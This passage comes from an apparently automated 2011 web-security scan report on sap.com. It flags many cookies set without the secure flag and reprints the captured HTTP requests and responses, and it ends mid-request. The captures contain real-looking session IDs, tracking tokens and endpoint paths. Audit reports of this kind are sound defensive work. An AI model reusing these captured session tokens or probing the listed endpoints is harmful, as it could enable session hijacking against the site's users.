Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CodeTrackingCookie=url_campaignId=Q311_cs2011_freetrial_estore; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx

Response

HTTP/1.1 302 Moved temporarily
set-cookie: oucqqqqqqqqoqqqroreeqobdexovrwyuvqxcqut=0y9OLNAHotJM%252FaLUgvzizJL8okr9YiCZqh9cklhUEpCYnqqXUZKbowAA; path=/
set-cookie: sap-usercontext=sap-client=002; path=/
content-type: text/html
content-length: 0
cache-control: no-cache, no-store
pragma: no-cache
expires: Thu, 01 Jan 1970 00:00:00 GMT
location: https://accounts.sap.com/saml2/idp/sso/accounts.sap.com?SAMLRequest=fZFRS8MwFIX%2FSsl7m2TtnIS1MBiDgkqx4oNvMb1jgTaJuanovzfNRCbiAnk5ued%2B55Atyml0YjeHk3mEtxkwZO2%2BJj37Pnm8POcALH8dYJOv%2Bc1ttWYbxaqSZM%2FgUVtTk1XBSNYiztAaDNKEKDEejSzn6ydeiXIlqvKFZPtI0EaG5DqF4FBQKpWyswlYoHSFshNdUq2oHhxFtH%2BeSXawXkEKXZOjHBEWeCcR9Tv8KB%2FTaFCkgjWZvRFWokZh5AQoghL97v5OxODCeRussiNptsu0SD38hf%2B6PWLBL4VI0%2B%2B6PlifooEJWqWih65kW3qx%2Bsxx4iHuavedHbX6XDpNMvyP4gVPih7yYxoVs0EHSh81DIQ2Z8Lvv2y%2BAA%3D%3D&RelayState=oucqqqqqqqqoqqqroreeqobdexovrwyuvqxcqut
connection: close

8.8. https://training.sap.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://training.sap.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: training.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 15 Oct 2011 14:58:52 GMT
Server: Apache
Set-Cookie: ecomssid=fvscn6jrn5dm1p8m0c17ts0du0; path=/; domain=.sap.com; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ecomguid=3f868610-479e-adc4-fdf5-6eba419da7ce; expires=Sun, 14-Oct-2012 14:58:52 GMT; path=/; domain=.sap.com; httponly
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; expires=Mon, 14-Oct-2013 14:58:52 GMT; path=/; domain=.sap.com; httponly
X-Frame-Options: sameorigin
X-Content-Type-Options: nosniff
Set-Cookie: UsersDefaultCountry=CA; expires=Mon, 14-Nov-2011 14:58:53 GMT; path=/; domain=.sap.com
Set-Cookie: UsersDefaultLanguage=EN; expires=Mon, 14-Nov-2011 14:58:53 GMT; path=/; domain=.sap.com
Location: /ca/en/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

8.9. https://www.sap.com/WebResource.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /WebResource.axd

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /WebResource.axd HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html
Location: /errorpage.epx
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:04:25 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:04:25 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:04:25 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/errorpage.epx">here</a>.</h2>
</body></html>
8.10. https://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/Tracking.epi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/Tracking.epi

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/Tracking.epi?kNtBzmUK9zU HTTP/1.1
Host: www.sap.com
Connection: keep-alive
Content-Length: 439
Origin: https://www.sap.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/xml
Accept: */*
Referer: https://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx?URL_ID=Q311_cs2011_freetrial_estore&kNtBzmUK9zU=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=url_campaignId=Q311_cs2011_freetrial_estore; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS

{"method":"TrackInteraction","arguments":["https://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx?URL_ID=Q311_cs2011_freetrial_estore&kNtBzmUK9zU=1","http://store.businessobj
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:32:19 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:32:19 GMT; path=/
Set-Cookie: SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:32:19 GMT

8.11. https://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx?URL_ID=Q311_cs2011_freetrial_estore&kNtBzmUK9zU=1 HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://store.businessobjects.com/DRHM/store?Action=DisplayProductDetailsPage&SiteID=bobjamer&Locale=en_US&Env=BASE&productID=231860300&parentCategoryID=57065700&categoryID=57066300&_s_icmp=CG4E7A594
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=url_campaignId=Q311_cs2011_freetrial_estore&ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fDRHM%2fstore%3fAction%3dDisplayProductDetailsPage%26SiteID%3dbobjamer%26Locale%3den_US%26Env%3dBASE%26productID%3d231860300%26parentCategoryID%3d57065700%26categoryID%3d57066300%26_s_icmp%3dCG4E7A594; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:32:09 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:32:09 GMT; path=/
Set-Cookie: CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fDRHM%2fstore%3fAction%3dDisplayProductDetailsPage%26SiteID%3dbobjamer%26Locale%3den_US%26Env%3dBASE%26productID%3d231860300%26parentCategoryID%3d57065700%26categoryID%3d57066300%26_s_icmp%3dCG4E7A594; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:32:09 GMT; path=/
Set-Cookie: CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; domain=.sap.com; path=/
Set-Cookie: CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; domain=.sap.com; path=/
Set-Cookie: CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:32:10 GMT
Content-Length: 149165


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script language="
...[SNIP]...
8.12. https://www.sap.com/contactsap/contact_warning.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /contactsap/contact_warning.epx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /contactsap/contact_warning.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 3471
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:04:04 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:04:04 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:04:31 GMT
Connection: close


<html>
   <head>
       <title>SAP - Contact SAP Warning</title>    
       <meta http-equiv=Content-Type content="text/html; charset=utf-8">
       <meta id="metaContentLanguage" http-equiv="Content-Language" cont
...[SNIP]...
8.13. https://www.sap.com/contactsap/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /contactsap/index.epx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /contactsap/index.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 126
Content-Type: text/html; charset=utf-8
Location: /host.epx
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:04:01 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:04:01 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:04:01 GMT; path=/
Set-Cookie: pmereturnurl=%2fhost.epx; domain=.sap.com; path=/
Set-Cookie: pmelayerurl=%2fcontactsap%2findex.epx%3fpmelayer%3dtrue; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:04:04 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/host.epx">here</a>.</h2>
</body></html>
8.14. https://www.sap.com/host.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /host.epx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /host.epx?kNtBzmUK9zU HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapbusinessoptimizer.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; a1slocale=en; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; 37021986-VID=5110247826455; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=144fe053-5592-4145-8a61-c484bd4d3e8b; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapbusinessoptimizer.com%2f; SAP.SITE.COOKIE=cmpgn.code=CRM-US10-SGE-FRBUSOPT&cmpn=CRM-US10-SGE-FRBUSOPT; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; OriginatingURL=http://www.sapbusinessoptimizer.com/; SingleSignOnURL=51a3d747-8c02-417d-8f96-ae6e0ddd405d||||http://www.sapbusinessoptimizer.com/|; pmeoriginalurl=%2fhost.epx; pmereturnurl=%2fgwtservice.epx; pmelayerurl=%2fprofile%2flogin.epx%3fCCB945D0C99C211CE485301170A282A69A2B5D457FDCA8EAE05552155D0CA1E3EEFD315BAADABA281797FD8B20AF2220%26pmelayer%3dtrue; pmedialogmode=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:30:16 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 16:30:16 GMT; path=/
Set-Cookie: CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapbusinessoptimizer.com%2f; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:30:16 GMT; path=/
Set-Cookie: pmelayerurl=; domain=.sap.com; path=/
Set-Cookie: pmedialogmode=; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:30:15 GMT
Content-Length: 32896


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
8.15. https://www.sap.com/omni.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /omni.epx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /omni.epx HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://forums.sdn.sap.com/forum.jspa?forumID=209&start=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; mbox=session#1318688512533-813903#1318690473|check#true#1318688673; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="CAO PSA OUR"
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:24:31 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:24:31 GMT; path=/
Set-Cookie: CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fforums.sdn.sap.com%2fforum.jspa%3fforumID%3d209%26start%3d0; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:24:31 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:24:32 GMT
Content-Length: 86

var omni_value = '50271dcd-9baa-4ef3-893c-9fb47c6b6fd7';
var omni_ttc = '1318688493';
8.16. https://www.sap.com/profile/captcha.epimg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /profile/captcha.epimg

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /profile/captcha.epimg?eqs=80FDF91121181B29096FDBF8C13490FC3D78E210BA998B1C50C73CC97CDD1CB5 HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://www.sap.com/profile/slogin.epx?pmelayer=true&kNtBzmUK9zU=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1318690514391%3B%20pe%3Dno%2520value%7C1318690514393%3B%20c3%3Dno%2520value%7C1318690514395%3B%20s_nr%3D1318688714402-New%7C1321280714402%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292314404%3B%20s_visit%3D1%7C1318690514405%3B%20gpv_p47%3Dno%2520value%7C1318690514407%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D3%3B%20s_sq%3D%3B; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapphirenow.com%2flogin.aspx%3fReturnUrl%3d%2fdefault.aspx; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 4605
Content-Type: image/jpeg
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:26:16 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:26:16 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:26:15 GMT

......JFIF.....`.`.....C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......<...."..............................
...[SNIP]...
8.17. https://www.sap.com/profile/login.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /profile/login.epx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /profile/login.epx HTTP/1.1
